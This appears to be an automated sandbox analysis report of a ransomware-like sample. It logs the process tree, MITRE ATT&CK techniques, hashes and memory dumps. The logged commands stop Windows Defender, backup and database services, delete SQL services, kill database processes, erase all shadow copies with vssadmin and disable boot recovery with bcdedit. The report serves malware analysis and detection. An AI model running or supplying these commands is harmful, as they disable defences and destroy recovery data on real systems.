C:\Windows\system32\net1 stop WinDefend
4⤵
PID:3756

C:\Windows\SysWOW64\net.exe
net stop mr2kserv
3⤵
PID:3728

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mr2kserv
4⤵
PID:3724

C:\Windows\SysWOW64\net.exe
net stop MSExchangeADTopology
3⤵
PID:3708

C:\Windows\SysWOW64\net.exe
net stop MSExchangeFBA
3⤵
PID:2012

C:\Windows\SysWOW64\net.exe
net stop MSExchangeIS
3⤵
PID:976

C:\Windows\SysWOW64\net.exe
net stop MSExchangeSA
3⤵
PID:4352

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA
4⤵
PID:1104

C:\Windows\SysWOW64\net.exe
net stop ShadowProtectSvc
3⤵
PID:5068

C:\Windows\SysWOW64\net.exe
net stop SPAdminV4
3⤵
PID:2480

C:\Windows\SysWOW64\net.exe
net stop SPTimerV4
3⤵
PID:1588

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPTimerV4
4⤵
PID:4468

C:\Windows\SysWOW64\net.exe
net stop SPTraceV4
3⤵
PID:2156

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPTraceV4
4⤵
PID:2184

C:\Windows\SysWOW64\net.exe
net stop SPUserCodeV4
3⤵
PID:1564

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPUserCodeV4
4⤵
PID:1464

C:\Windows\SysWOW64\net.exe
net stop SPWriterV4
3⤵
PID:2900

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPWriterV4
4⤵
PID:2816

C:\Windows\SysWOW64\net.exe
net stop SPSearch4
3⤵
PID:4604

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPSearch4
4⤵
PID:1084

C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper100
3⤵
PID:1156

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100
4⤵
PID:4928

C:\Windows\SysWOW64\net.exe
net stop IISADMIN
3⤵
PID:3704

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISADMIN
4⤵
PID:2600

C:\Windows\SysWOW64\net.exe
net stop firebirdguardiandefaultinstance
3⤵
PID:4088

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop firebirdguardiandefaultinstance
4⤵
PID:4656

C:\Windows\SysWOW64\net.exe
net stop ibmiasrw
3⤵
PID:4920

C:\Windows\SysWOW64\net.exe
net stop QBCFMonitorService
3⤵
PID:3632

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService
4⤵
PID:504

C:\Windows\SysWOW64\net.exe
net stop QBVSS
3⤵
PID:1572

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBVSS
4⤵
PID:1916

C:\Windows\SysWOW64\net.exe
net stop QBPOSDBServiceV12
3⤵
PID:4488

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBPOSDBServiceV12
4⤵
PID:1340

C:\Windows\SysWOW64\net.exe
net stop "IBM Domino Server (CProgramFilesIBMDominodata)"
3⤵
PID:3848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "IBM Domino Server (CProgramFilesIBMDominodata)"
4⤵
PID:4700

C:\Windows\SysWOW64\net.exe
net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
3⤵
PID:696

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
4⤵
PID:256

C:\Windows\SysWOW64\net.exe
net stop IISADMIN
3⤵
PID:1128

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISADMIN
4⤵
PID:3228

C:\Windows\SysWOW64\net.exe
net stop "Simply Accounting Database Connection Manager"
3⤵
PID:264

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Simply Accounting Database Connection Manager"
4⤵
PID:4264

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB1
3⤵
PID:3324

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB1
4⤵
PID:3760

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB2
3⤵
PID:3184

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB2
4⤵
PID:3172

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB3
3⤵
PID:3156

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB3
4⤵
PID:4672

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB4
3⤵
PID:4588

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB4
4⤵
PID:4012

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB5
3⤵
PID:1744

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB5
4⤵
PID:5112

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im UniFi.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1192

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq MsMpEng.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1232

C:\Windows\SysWOW64\find.exe
find /c "PID"
3⤵
PID:4196

C:\Users\Admin\AppData\Local\Temp\6cb1d245920799a1cc2dd8ee69e052d8.exe
C:\Users\Admin\AppData\Local\Temp\6cb1d245920799a1cc2dd8ee69e052d8.exe
2⤵
PID:3436

C:\Users\Admin\AppData\Local\Temp\6cb1d245920799a1cc2dd8ee69e052d8.exe
C:\Users\Admin\AppData\Local\Temp\6cb1d245920799a1cc2dd8ee69e052d8.exe
2⤵
PID:4728

C:\Users\Admin\AppData\Local\Temp\6cb1d245920799a1cc2dd8ee69e052d8.exe
C:\Users\Admin\AppData\Local\Temp\6cb1d245920799a1cc2dd8ee69e052d8.exe
2⤵
- Checks computer location settings
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:5064

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
3⤵
PID:1324

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1572

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLFDLauncher"
4⤵
PID:1704

C:\Windows\system32\vssadmin.exe
"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:3276

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
3⤵
PID:3412

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2504

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ibmiasrw
1⤵
PID:1272

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

File Deletion

2

T1107

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Modify Registry

2

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Peripheral Device Discovery

1

T1120

Process Discovery

1

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

2

T1490

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Vahuygrzckill$-arab.bat
Filesize
53KB

MD5
b57545cb36ef6a19fdde4b2208ebb225

SHA1
1d319740835ff12562e04cc74545a047bba63031

SHA256
445d709ea4ae38706a0cc47ffc6c100fb9a354ff1ac718d0c23415524bdfc895

SHA512
3618bb17282d8d82ff280590563eebd5c0b181d24156f6a69cba53d17a1bae0d9287c9f191efbe6c3d4223bcb47348c74177000aa0844263ed176df56e1f0856

Download Submit
memory/412-163-0x0000000000000000-mapping.dmp

Download
memory/540-190-0x0000000000000000-mapping.dmp

Download
memory/600-177-0x0000000000000000-mapping.dmp

Download
memory/688-187-0x0000000000000000-mapping.dmp

Download
memory/696-162-0x0000000000000000-mapping.dmp

Download
memory/744-148-0x0000000000000000-mapping.dmp

Download
memory/796-189-0x0000000000000000-mapping.dmp

Download
memory/932-202-0x0000000000000000-mapping.dmp

Download
memory/1180-175-0x0000000000000000-mapping.dmp

Download
memory/1232-180-0x0000000000000000-mapping.dmp

Download
memory/1296-203-0x0000000000000000-mapping.dmp

Download
memory/1300-182-0x0000000000000000-mapping.dmp

Download
memory/1320-138-0x0000000000000000-mapping.dmp

Download
memory/1324-152-0x0000000000000000-mapping.dmp

Download
memory/1372-171-0x0000000000000000-mapping.dmp

Download
memory/1468-164-0x0000000000000000-mapping.dmp

Download
memory/1496-159-0x0000000000000000-mapping.dmp

Download
memory/1504-165-0x0000000000000000-mapping.dmp

Download
memory/1508-168-0x0000000000000000-mapping.dmp

Download
memory/1532-183-0x0000000000000000-mapping.dmp

Download
memory/1572-153-0x0000000000000000-mapping.dmp

Download
memory/1704-156-0x0000000000000000-mapping.dmp

Download
memory/1860-188-0x0000000000000000-mapping.dmp

Download
memory/2008-185-0x0000000000000000-mapping.dmp

Download
memory/2324-167-0x0000000000000000-mapping.dmp

Download
memory/2360-192-0x0000000000000000-mapping.dmp

Download
memory/2568-179-0x0000000000000000-mapping.dmp

Download
memory/2704-160-0x0000000000000000-mapping.dmp

Download
memory/2752-181-0x0000000000000000-mapping.dmp

Download
memory/2756-194-0x0000000000000000-mapping.dmp

Download
memory/3000-170-0x0000000000000000-mapping.dmp

Download
memory/3020-186-0x0000000000000000-mapping.dmp

Download
memory/3184-166-0x0000000000000000-mapping.dmp

Download
memory/3204-198-0x0000000000000000-mapping.dmp

Download
memory/3276-154-0x0000000000000000-mapping.dmp

Download
memory/3296-197-0x0000000000000000-mapping.dmp

Download
memory/3412-155-0x0000000000000000-mapping.dmp

Download
memory/3436-144-0x0000000000000000-mapping.dmp

Download
memory/3708-141-0x0000000000000000-mapping.dmp

Download
memory/3728-140-0x0000000000000000-mapping.dmp

Download
memory/3736-142-0x0000000000000000-mapping.dmp

Download
memory/3780-169-0x0000000000000000-mapping.dmp

Download
memory/3816-143-0x0000000000000000-mapping.dmp

Download
memory/3936-201-0x0000000000000000-mapping.dmp

Download
memory/4060-196-0x0000000000000000-mapping.dmp

Download
memory/4100-184-0x0000000000000000-mapping.dmp

Download
memory/4168-204-0x0000000000000000-mapping.dmp

Download
memory/4196-178-0x0000000000000000-mapping.dmp

Download
memory/4288-151-0x0000000000000000-mapping.dmp

Download
memory/4356-173-0x0000000000000000-mapping.dmp

Download
memory/4360-172-0x0000000000000000-mapping.dmp

Download
memory/4420-176-0x0000000000000000-mapping.dmp

Download
memory/4492-200-0x0000000000000000-mapping.dmp

Download
memory/4564-199-0x0000000000000000-mapping.dmp

Download
memory/4592-191-0x0000000000000000-mapping.dmp

Download
memory/4596-157-0x0000000000000000-mapping.dmp

Download
memory/4612-158-0x0000000000000000-mapping.dmp

Download
memory/4696-134-0x0000000005E20000-0x00000000063C4000-memory.dmp

Filesize
5.6MB

Download
memory/4696-132-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/4696-133-0x0000000000D30000-0x0000000000DC2000-memory.dmp

Filesize
584KB

Download
memory/4696-135-0x0000000000E00000-0x0000000000E22000-memory.dmp

Filesize
136KB

Download
memory/4728-145-0x0000000000000000-mapping.dmp

Download
memory/4792-139-0x0000000000000000-mapping.dmp

Download
memory/4832-193-0x0000000000000000-mapping.dmp

Download
memory/4852-195-0x0000000000000000-mapping.dmp

Download
memory/4892-136-0x0000000000000000-mapping.dmp

Download
memory/5004-174-0x0000000000000000-mapping.dmp

Download
memory/5064-161-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/5064-149-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/5064-147-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/5064-146-0x0000000000000000-mapping.dmp

Download
memory/5064-150-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/5064-205-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads